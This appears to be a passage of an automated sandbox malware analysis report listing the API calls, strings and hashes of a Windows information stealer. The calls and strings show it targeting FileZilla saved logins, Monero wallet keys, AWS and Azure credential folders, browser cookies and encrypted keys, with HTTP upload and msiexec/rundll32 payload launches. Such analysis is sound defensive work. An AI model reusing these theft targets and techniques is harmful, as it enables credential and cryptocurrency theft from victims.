                                      • lstrcat.KERNEL32(?,00D51794), ref: 00D40795
                                      • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00D50DB7), ref: 00D407EE
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                                      • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                      • API String ID: 1942843190-555421843
                                      • Opcode ID: 20d008aecb714d7d6fcc15812f29234d63ac6096a998c793aeb89be8f59be73d
                                      • Instruction ID: 2fca80c06514d6d9231a7c4d5f5caad778c39511a44684f0f4989bf6d10a9602
                                      • Opcode Fuzzy Hash: 20d008aecb714d7d6fcc15812f29234d63ac6096a998c793aeb89be8f59be73d
                                      • Instruction Fuzzy Hash: 1DD13F75940208ABDF14EBF8DD96EEE7739EF18301F008558F542A6095EF79AA08CB71
                                      APIs
                                        • Part of subcall function 00D4AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00D4AAF6
                                        • Part of subcall function 00D34800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00D34889
                                        • Part of subcall function 00D34800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00D34899
                                        • Part of subcall function 00D4AA50: lstrcpy.KERNEL32(00D50E1A,00000000), ref: 00D4AA98
                                      • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00D35A48
                                      • StrCmpCA.SHLWAPI(?,0167E7D8), ref: 00D35A63
                                      • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00D35BE3
                                      • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,0167E868,00000000,?,0167A3C0,00000000,?,00D51B4C), ref: 00D35EC1
                                      • lstrlen.KERNEL32(00000000), ref: 00D35ED2
                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 00D35EE3
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00D35EEA
                                      • lstrlen.KERNEL32(00000000), ref: 00D35EFF
                                      • lstrlen.KERNEL32(00000000), ref: 00D35F28
                                      • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00D35F41
                                      • lstrlen.KERNEL32(00000000,?,?), ref: 00D35F6B
                                      • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00D35F7F
                                      • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00D35F9C
                                      • InternetCloseHandle.WININET(00000000), ref: 00D36000
                                      • InternetCloseHandle.WININET(00000000), ref: 00D3600D
                                      • HttpOpenRequestA.WININET(00000000,0167E7A8,?,0167E3F8,00000000,00000000,00400100,00000000), ref: 00D35C48
                                        • Part of subcall function 00D4ACC0: lstrlen.KERNEL32(?,01678F98,?,\Monero\wallet.keys,00D50E1A), ref: 00D4ACD5
                                        • Part of subcall function 00D4ACC0: lstrcpy.KERNEL32(00000000), ref: 00D4AD14
                                        • Part of subcall function 00D4ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00D4AD22
                                        • Part of subcall function 00D4ABB0: lstrcpy.KERNEL32(?,00D50E1A), ref: 00D4AC15
                                        • Part of subcall function 00D4AC30: lstrcpy.KERNEL32(00000000,?), ref: 00D4AC82
                                        • Part of subcall function 00D4AC30: lstrcat.KERNEL32(00000000), ref: 00D4AC92
                                      • InternetCloseHandle.WININET(00000000), ref: 00D36017
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      • Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                                      • String ID: "$"$------$------$------
                                      • API String ID: 874700897-2180234286
                                      • Opcode ID: 524f66935ae3a56416c89219bffe98f7318ac0b6f072183473898f89b3152700
                                      • Instruction ID: a2bcf02a7cafa0610b6d67dd8e7dd314fb891cf2244a6e57222cb7be8d37fa41
                                      • Opcode Fuzzy Hash: 524f66935ae3a56416c89219bffe98f7318ac0b6f072183473898f89b3152700
                                      • Instruction Fuzzy Hash: 5E120C72960528ABDB15EBA4DCA6FEEB379FF14700F004199F10662091EF746A48CF75
                                      APIs
                                        • Part of subcall function 00D4AA50: lstrcpy.KERNEL32(00D50E1A,00000000), ref: 00D4AA98
                                        • Part of subcall function 00D4ACC0: lstrlen.KERNEL32(?,01678F98,?,\Monero\wallet.keys,00D50E1A), ref: 00D4ACD5
                                        • Part of subcall function 00D4ACC0: lstrcpy.KERNEL32(00000000), ref: 00D4AD14
                                        • Part of subcall function 00D4ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00D4AD22
                                        • Part of subcall function 00D4ABB0: lstrcpy.KERNEL32(?,00D50E1A), ref: 00D4AC15
                                        • Part of subcall function 00D48CF0: GetSystemTime.KERNEL32(00D50E1B,0167A270,00D505B6,?,?,00D313F9,?,0000001A,00D50E1B,00000000,?,01678F98,?,\Monero\wallet.keys,00D50E1A), ref: 00D48D16
                                        • Part of subcall function 00D4AC30: lstrcpy.KERNEL32(00000000,?), ref: 00D4AC82
                                        • Part of subcall function 00D4AC30: lstrcat.KERNEL32(00000000), ref: 00D4AC92
                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00D3D083
                                      • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00D3D1C7
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00D3D1CE
                                      • lstrcat.KERNEL32(?,00000000), ref: 00D3D308
                                      • lstrcat.KERNEL32(?,00D51570), ref: 00D3D317
                                      • lstrcat.KERNEL32(?,00000000), ref: 00D3D32A
                                      • lstrcat.KERNEL32(?,00D51574), ref: 00D3D339
                                      • lstrcat.KERNEL32(?,00000000), ref: 00D3D34C
                                      • lstrcat.KERNEL32(?,00D51578), ref: 00D3D35B
                                      • lstrcat.KERNEL32(?,00000000), ref: 00D3D36E
                                      • lstrcat.KERNEL32(?,00D5157C), ref: 00D3D37D
                                      • lstrcat.KERNEL32(?,00000000), ref: 00D3D390
                                      • lstrcat.KERNEL32(?,00D51580), ref: 00D3D39F
                                      • lstrcat.KERNEL32(?,00000000), ref: 00D3D3B2
                                      • lstrcat.KERNEL32(?,00D51584), ref: 00D3D3C1
                                      • lstrcat.KERNEL32(?,00000000), ref: 00D3D3D4
                                      • lstrcat.KERNEL32(?,00D51588), ref: 00D3D3E3
                                        • Part of subcall function 00D4AB30: lstrlen.KERNEL32(00D34F55,?,?,00D34F55,00D50DDF), ref: 00D4AB3B
                                        • Part of subcall function 00D4AB30: lstrcpy.KERNEL32(00D50DDF,00000000), ref: 00D4AB95
                                      • lstrlen.KERNEL32(?), ref: 00D3D42A
                                      • lstrlen.KERNEL32(?), ref: 00D3D439
                                        • Part of subcall function 00D4AD80: StrCmpCA.SHLWAPI(00000000,00D51568,00D3D2A2,00D51568,00000000), ref: 00D4AD9F
                                      • DeleteFileA.KERNEL32(00000000), ref: 00D3D4B4
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                                      • String ID:
                                      • API String ID: 1956182324-0
                                      • Opcode ID: 29c0f1b4b0d9aa299fccd3d0816f0d00b9a338e72a3ff362192971ac07389916
                                      • Instruction ID: 14a37afadf7048da0b9b26106eff9b7d75ec5a84a94781d15dd2ec83c119b59e
                                      • Opcode Fuzzy Hash: 29c0f1b4b0d9aa299fccd3d0816f0d00b9a338e72a3ff362192971ac07389916
                                      • Instruction Fuzzy Hash: 0EE14C75950108ABDB15EBA8DDA6EEE7339EF14301F004158F546B6091EF3ABE08CB72
                                      APIs
                                        • Part of subcall function 00D4AA50: lstrcpy.KERNEL32(00D50E1A,00000000), ref: 00D4AA98
                                        • Part of subcall function 00D4AC30: lstrcpy.KERNEL32(00000000,?), ref: 00D4AC82
                                        • Part of subcall function 00D4AC30: lstrcat.KERNEL32(00000000), ref: 00D4AC92
                                        • Part of subcall function 00D4ABB0: lstrcpy.KERNEL32(?,00D50E1A), ref: 00D4AC15
                                        • Part of subcall function 00D4ACC0: lstrlen.KERNEL32(?,01678F98,?,\Monero\wallet.keys,00D50E1A), ref: 00D4ACD5
                                        • Part of subcall function 00D4ACC0: lstrcpy.KERNEL32(00000000), ref: 00D4AD14
                                        • Part of subcall function 00D4ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00D4AD22
                                      • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,0167CF18,00000000,?,00D51544,00000000,?,?), ref: 00D3CB6C
                                      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 00D3CB89
                                      • GetFileSize.KERNEL32(00000000,00000000), ref: 00D3CB95
                                      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00D3CBA8
                                      • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00D3CBD9
                                      • StrStrA.SHLWAPI(?,0167CDF8,00D50B56), ref: 00D3CBF7
                                      • StrStrA.SHLWAPI(00000000,0167CE70), ref: 00D3CC1E
                                      • StrStrA.SHLWAPI(?,0167D8E0,00000000,?,00D51550,00000000,?,00000000,00000000,?,01679238,00000000,?,00D5154C,00000000,?), ref: 00D3CDA2
                                      • StrStrA.SHLWAPI(00000000,0167D780), ref: 00D3CDB9
                                        • Part of subcall function 00D3C920: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00D3C971
                                        • Part of subcall function 00D3C920: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00D3C97C
                                      • StrStrA.SHLWAPI(?,0167D780,00000000,?,00D51554,00000000,?,00000000,01679108), ref: 00D3CE5A
                                      • StrStrA.SHLWAPI(00000000,01678FE8), ref: 00D3CE71
                                        • Part of subcall function 00D3C920: lstrcat.KERNEL32(?,00D50B47), ref: 00D3CA43
                                        • Part of subcall function 00D3C920: lstrcat.KERNEL32(?,00D50B4B), ref: 00D3CA57
                                        • Part of subcall function 00D3C920: lstrcat.KERNEL32(?,00D50B4E), ref: 00D3CA78
                                      • lstrlen.KERNEL32(00000000), ref: 00D3CF44
                                      • CloseHandle.KERNEL32(00000000), ref: 00D3CF9C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                                      • String ID:
                                      • API String ID: 3744635739-3916222277
                                      • Opcode ID: 61d43442a9724a2a6a5d0e0fe048cc08dcbc3f23809cb7941aaa8d87b20971a0
                                      • Instruction ID: da4ad6303b5be4b5c8bbec43ebcd739c00d5d2e61ca967825b718af82580eaa0
                                      • Opcode Fuzzy Hash: 61d43442a9724a2a6a5d0e0fe048cc08dcbc3f23809cb7941aaa8d87b20971a0
                                      • Instruction Fuzzy Hash: 71E11772950108ABDB15EBA8DCA2FEEB779EF58300F004199F14663192EF356A49CF71
                                      APIs
                                        • Part of subcall function 00D4AA50: lstrcpy.KERNEL32(00D50E1A,00000000), ref: 00D4AA98
                                      • RegOpenKeyExA.ADVAPI32(00000000,0167B1C8,00000000,00020019,00000000,00D505BE), ref: 00D48534
                                      • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00D485B6
                                      • wsprintfA.USER32 ref: 00D485E9
                                      • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00D4860B
                                      • RegCloseKey.ADVAPI32(00000000), ref: 00D4861C
                                      • RegCloseKey.ADVAPI32(00000000), ref: 00D48629
                                        • Part of subcall function 00D4AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00D4AAF6
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseOpenlstrcpy$Enumwsprintf
                                      • String ID: - $%s\%s$?
                                      • API String ID: 3246050789-3278919252
                                      • Opcode ID: 8f23db9cb5a23d3b01f67c8036a4b59d3acffb15069eddd7cfb0229b2af255ed
                                      • Instruction ID: 56886161ef75f2fed0e917c13297e20a7af24cee03610e17e05341cec5f0654f
                                      • Opcode Fuzzy Hash: 8f23db9cb5a23d3b01f67c8036a4b59d3acffb15069eddd7cfb0229b2af255ed
                                      • Instruction Fuzzy Hash: F3811A71950118ABEB24DF54CD91FEAB7B9FB48340F1082D9E149A6180DF75AB88CFB0
                                      APIs
                                        • Part of subcall function 00D48F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00D48F9B
                                      • lstrcat.KERNEL32(?,00000000), ref: 00D45000
                                      • lstrcat.KERNEL32(?,\.azure\), ref: 00D4501D
                                        • Part of subcall function 00D44B60: wsprintfA.USER32 ref: 00D44B7C
                                        • Part of subcall function 00D44B60: FindFirstFileA.KERNEL32(?,?), ref: 00D44B93
                                      • lstrcat.KERNEL32(?,00000000), ref: 00D4508C
                                      • lstrcat.KERNEL32(?,\.aws\), ref: 00D450A9
                                        • Part of subcall function 00D44B60: StrCmpCA.SHLWAPI(?,00D50FC4), ref: 00D44BC1
                                        • Part of subcall function 00D44B60: StrCmpCA.SHLWAPI(?,00D50FC8), ref: 00D44BD7
                                        • Part of subcall function 00D44B60: FindNextFileA.KERNEL32(000000FF,?), ref: 00D44DCD
                                        • Part of subcall function 00D44B60: FindClose.KERNEL32(000000FF), ref: 00D44DE2
                                      • lstrcat.KERNEL32(?,00000000), ref: 00D45118
                                      • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00D45135
                                        • Part of subcall function 00D44B60: wsprintfA.USER32 ref: 00D44C00
                                        • Part of subcall function 00D44B60: StrCmpCA.SHLWAPI(?,00D508D3), ref: 00D44C15
                                        • Part of subcall function 00D44B60: wsprintfA.USER32 ref: 00D44C32
                                        • Part of subcall function 00D44B60: PathMatchSpecA.SHLWAPI(?,?), ref: 00D44C6E
                                        • Part of subcall function 00D44B60: lstrcat.KERNEL32(?,0167E888), ref: 00D44C9A
                                        • Part of subcall function 00D44B60: lstrcat.KERNEL32(?,00D50FE0), ref: 00D44CAC
                                        • Part of subcall function 00D44B60: lstrcat.KERNEL32(?,?), ref: 00D44CC0
                                        • Part of subcall function 00D44B60: lstrcat.KERNEL32(?,00D50FE4), ref: 00D44CD2
                                        • Part of subcall function 00D44B60: lstrcat.KERNEL32(?,?), ref: 00D44CE6
                                        • Part of subcall function 00D44B60: CopyFileA.KERNEL32(?,?,00000001), ref: 00D44CFC
                                        • Part of subcall function 00D44B60: DeleteFileA.KERNEL32(?), ref: 00D44D81
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                      • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                      • API String ID: 949356159-974132213
                                      • Opcode ID: 0bb253d77e44cbd2fa2579e5fea6dba53742aa40c73a436505df87006956797b
                                      • Instruction ID: 4ab330752cb568279a14575d9178897fa2d00201adaaa75e1cff8f6864ff6663
                                      • Opcode Fuzzy Hash: 0bb253d77e44cbd2fa2579e5fea6dba53742aa40c73a436505df87006956797b
                                      • Instruction Fuzzy Hash: A841A47A9402186BEF24E760EC57FED33389B64705F000454B985650C1EEB9ABCC8BB2
                                      APIs
                                      • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00D491FC
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CreateGlobalStream
                                      • String ID: image/jpeg
                                      • API String ID: 2244384528-3785015651
                                      • Opcode ID: e9a5ed1b449ac230314317ec7a401fdcfd2da23d8479171500225d6817686f0c
                                      • Instruction ID: f756c40b15f1191253de37e41f06a7af6b6c4923057374f34870ba8a6bd0227e
                                      • Opcode Fuzzy Hash: e9a5ed1b449ac230314317ec7a401fdcfd2da23d8479171500225d6817686f0c
                                      • Instruction Fuzzy Hash: B371BA75A10208ABDB14EFE4D899FEEB779FB48700F108508F556A7284DB79E944CB70
                                      APIs
                                        • Part of subcall function 00D4AA50: lstrcpy.KERNEL32(00D50E1A,00000000), ref: 00D4AA98
                                      • ShellExecuteEx.SHELL32(0000003C), ref: 00D43415
                                      • ShellExecuteEx.SHELL32(0000003C), ref: 00D435AD
                                      • ShellExecuteEx.SHELL32(0000003C), ref: 00D4373A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ExecuteShell$lstrcpy
                                      • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                                      • API String ID: 2507796910-3625054190
                                      • Opcode ID: cef50a392855602ede42a082ecb7aa0d010f4a821541c8920fc457f3b4ba44ef
                                      • Instruction ID: a8baae5d8134c674d25efbbd22646afb70718626fa50dc4c9ff7f546b20a38c3
                                      • Opcode Fuzzy Hash: cef50a392855602ede42a082ecb7aa0d010f4a821541c8920fc457f3b4ba44ef
                                      • Instruction Fuzzy Hash: FA1208729501189BEB19EBA4DDA2FEEB739EF14300F004199F50666192EF346B49CF72
                                      APIs
                                      • lstrcat.KERNEL32(?,cookies), ref: 00D39CAF
                                      • lstrcat.KERNEL32(?,00D512C4), ref: 00D39CC1
                                      • lstrcat.KERNEL32(?,?), ref: 00D39CD5
                                      • lstrcat.KERNEL32(?,00D512C8), ref: 00D39CE7
                                      • lstrcat.KERNEL32(?,?), ref: 00D39CFB
                                      • lstrcat.KERNEL32(?,.txt), ref: 00D39D0D
                                      • lstrlen.KERNEL32(00000000), ref: 00D39D17
                                      • lstrlen.KERNEL32(00000000), ref: 00D39D26
                                        • Part of subcall function 00D4AA50: lstrcpy.KERNEL32(00D50E1A,00000000), ref: 00D4AA98
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$lstrlen$lstrcpy
                                      • String ID: .txt$/devtools$cookies$localhost$ws://localhost:9229
                                      • API String ID: 1797936820-3542011879
                                      • Opcode ID: 4a2930becb42c597b1c719e199a4f5091ef1511faeb5e84dc13b114776e6f927
                                      • Instruction ID: 1d1046c98500f0a9f4008776b16684625d739cba3791634677a9244b65cdd0a0
                                      • Opcode Fuzzy Hash: 4a2930becb42c597b1c719e199a4f5091ef1511faeb5e84dc13b114776e6f927
                                      • Instruction Fuzzy Hash: 3F517C76910618ABDB14EBE4DC96FEE7338AF04301F404558F60AA7084EF75AA48CF71
                                      APIs
                                        • Part of subcall function 00D4AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00D4AAF6
                                        • Part of subcall function 00D362D0: InternetOpenA.WININET(00D50DFF,00000001,00000000,00000000,00000000), ref: 00D36331
                                        • Part of subcall function 00D362D0: StrCmpCA.SHLWAPI(?,0167E7D8), ref: 00D36353
                                        • Part of subcall function 00D362D0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00D36385
                                        • Part of subcall function 00D362D0: HttpOpenRequestA.WININET(00000000,GET,?,0167E3F8,00000000,00000000,00400100,00000000), ref: 00D363D5
                                        • Part of subcall function 00D362D0: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00D3640F
                                        • Part of subcall function 00D362D0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00D36421
                                        • Part of subcall function 00D4ABB0: lstrcpy.KERNEL32(?,00D50E1A), ref: 00D4AC15
                                      • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00D45568
                                      • lstrlen.KERNEL32(00000000), ref: 00D4557F
                                        • Part of subcall function 00D48FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00D48FE2
                                      • StrStrA.SHLWAPI(00000000,00000000), ref: 00D455B4
                                      • lstrlen.KERNEL32(00000000), ref: 00D455D3
                                      • lstrlen.KERNEL32(00000000), ref: 00D455FE
                                        • Part of subcall function 00D4AA50: lstrcpy.KERNEL32(00D50E1A,00000000), ref: 00D4AA98
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                                      • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                      • API String ID: 3240024479-1526165396
                                      • Opcode ID: 53cf86e2b2d3d33aa5e13c4846b6377ecb266b90f89d1674163aceab062c699f
                                      • Instruction ID: c891a1a9fa95adff428ac922acec4e8e63528c52f6b5af34c47abf2f20528613
                                      • Opcode Fuzzy Hash: 53cf86e2b2d3d33aa5e13c4846b6377ecb266b90f89d1674163aceab062c699f
                                      • Instruction Fuzzy Hash: 45510C309505089BDB14FF68D9A6AED7739EF10381F504468F84A57592EF34AB09CB72
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpylstrlen
                                      • String ID:
                                      • API String ID: 2001356338-0
                                      • Opcode ID: 634b794779fafb0f987ace2d9d6bdf042a0a5ddb844d68fbd0491ca0ac88e5f2
                                      • Instruction ID: 5958119ef461a03afd05d00c3a837f9e91ed3836ef40e02084d7598cd65f182a
                                      • Opcode Fuzzy Hash: 634b794779fafb0f987ace2d9d6bdf042a0a5ddb844d68fbd0491ca0ac88e5f2
                                      • Instruction Fuzzy Hash: 6BC1B1B5940219ABCB24EF60DC9AFEE7379EF54304F004598E509A7241EB75EA84CFB1
                                      APIs
                                        • Part of subcall function 00D48F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00D48F9B
                                      • lstrcat.KERNEL32(?,00000000), ref: 00D4453C
                                      • lstrcat.KERNEL32(?,0167E0E0), ref: 00D4455B
                                      • lstrcat.KERNEL32(?,?), ref: 00D4456F
                                      • lstrcat.KERNEL32(?,0167CF60), ref: 00D44583
                                        • Part of subcall function 00D4AA50: lstrcpy.KERNEL32(00D50E1A,00000000), ref: 00D4AA98
                                        • Part of subcall function 00D48F20: GetFileAttributesA.KERNEL32(00000000,?,00D31B94,?,?,00D5577C,?,?,00D50E22), ref: 00D48F2F
                                        • Part of subcall function 00D3A430: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00D3A489
                                        • Part of subcall function 00D3A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00D3A13C
                                        • Part of subcall function 00D3A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00D3A161
                                        • Part of subcall function 00D3A110: LocalAlloc.KERNEL32(00000040,?), ref: 00D3A181
                                        • Part of subcall function 00D3A110: ReadFile.KERNEL32(000000FF,?,00000000,00D3148F,00000000), ref: 00D3A1AA
                                        • Part of subcall function 00D3A110: LocalFree.KERNEL32(00D3148F), ref: 00D3A1E0
                                        • Part of subcall function 00D3A110: CloseHandle.KERNEL32(000000FF), ref: 00D3A1EA
                                        • Part of subcall function 00D49550: GlobalAlloc.KERNEL32(00000000,00D4462D,00D4462D), ref: 00D49563
                                      • StrStrA.SHLWAPI(?,0167DF18), ref: 00D44643
                                      • GlobalFree.KERNEL32(?), ref: 00D44762
                                        • Part of subcall function 00D3A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00D34F3E,00000000,00000000), ref: 00D3A23F
                                        • Part of subcall function 00D3A210: LocalAlloc.KERNEL32(00000040,?,?,?,00D34F3E,00000000,?), ref: 00D3A251
                                        • Part of subcall function 00D3A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00D34F3E,00000000,00000000), ref: 00D3A27A
                                        • Part of subcall function 00D3A210: LocalFree.KERNEL32(?,?,?,?,00D34F3E,00000000,?), ref: 00D3A28F
                                      • lstrcat.KERNEL32(?,00000000), ref: 00D446F3
                                      • StrCmpCA.SHLWAPI(?,00D508D2), ref: 00D44710
                                      • lstrcat.KERNEL32(00000000,00000000), ref: 00D44722
                                      • lstrcat.KERNEL32(00000000,?), ref: 00D44735
                                      • lstrcat.KERNEL32(00000000,00D50FA0), ref: 00D44744
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                      • String ID:
                                      • API String ID: 3541710228-0
                                      • Opcode ID: 2f97b52d92eb7c919205ecb7748ddf0ddc593ae8abf4242758903face50e572e
                                      • Instruction ID: add378f7a5ed0d1b2eaca9a1f077ac41c1a15bf4b96463d5b765f8377b20977d
                                      • Opcode Fuzzy Hash: 2f97b52d92eb7c919205ecb7748ddf0ddc593ae8abf4242758903face50e572e
                                      • Instruction Fuzzy Hash: B27196B6900208ABDB14EBA4DC99FEE7379EB88300F004598F54596181EB35EB48CBB1
                                      APIs
                                        • Part of subcall function 00D312A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00D312B4
                                        • Part of subcall function 00D312A0: RtlAllocateHeap.NTDLL(00000000), ref: 00D312BB
                                        • Part of subcall function 00D312A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00D312D7
                                        • Part of subcall function 00D312A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00D312F5
                                        • Part of subcall function 00D312A0: RegCloseKey.ADVAPI32(?), ref: 00D312FF
                                      • lstrcat.KERNEL32(?,00000000), ref: 00D3134F
                                      • lstrlen.KERNEL32(?), ref: 00D3135C
